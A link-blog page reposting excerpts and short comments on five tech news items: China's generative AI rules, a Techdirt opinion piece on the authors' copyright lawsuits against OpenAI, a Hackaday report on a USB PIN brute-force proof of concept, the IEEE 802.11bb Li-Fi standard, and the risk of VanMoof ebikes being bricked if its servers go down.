China sets AI rules – not just risk based (EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their Ais under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.

The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because effectively they’re doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so to would be scanning internet content for training an LLM. Arguably the latter case is way more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for their to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most sources of trainable books most similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since in copyright legal fee awards are much more common).

That said, if we’ve learned anything at all in the past two plus decades of lawsuits about copyright and the internet, courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

Trying the twenty most common PINs doesn’t take long.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.

Once connected to a mobile device, it performs a form of keystroke injection attack, automatically sending keyboard events to input the most common PINs with a delay between each attempt. Assuming the device accepts, trying all twenty codes takes about six minutes.

Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video, embedded below.

 

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday

100x Faster Than Wi-Fi: Light-Based Networking Standard Released

Today, the Institute of Electrical and Electronics Engineers (IEEE) has added 802.11bb as a standard for light-based wireless communications. The publishing of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the  data-transmission technology standard.

Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability between Li-Fi systems with the successful Wi-Fi will be fully addressed.

[…]

Where Li-Fi shines (pun intended) is not just in its purported speeds as fast as 224 GB/s. Fraunhofer’s Dominic Schulz points out that as it works in an exclusive optical spectrum, this ensures higher reliability and lower latency and jitter. Moreover “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Shultz.

[…]

One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.

[…]

Source: 100x Faster Than Wi-Fi: Light-Based Networking Standard Released | Tom’s Hardware

VanMoof ebike should be bricked if servers go down – fortunately security is so bad a rival has an app to allow you to unlock it

[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes

[…]

While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.

Rival ebike company Cowboy has a solution

A rival ebike company, Belgian company Cowboy, has stepped in to offer a solution. TNW reports that it has created an app which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.

If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.

[…]

In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.

[…]

Perhaps we need standards here. For example, requiring all functionality (bar firmware updates) to work without access to an external server.

Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?

[…]

Source: VanMoof ebike mess highlights a risk with pricey smart hardware

Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.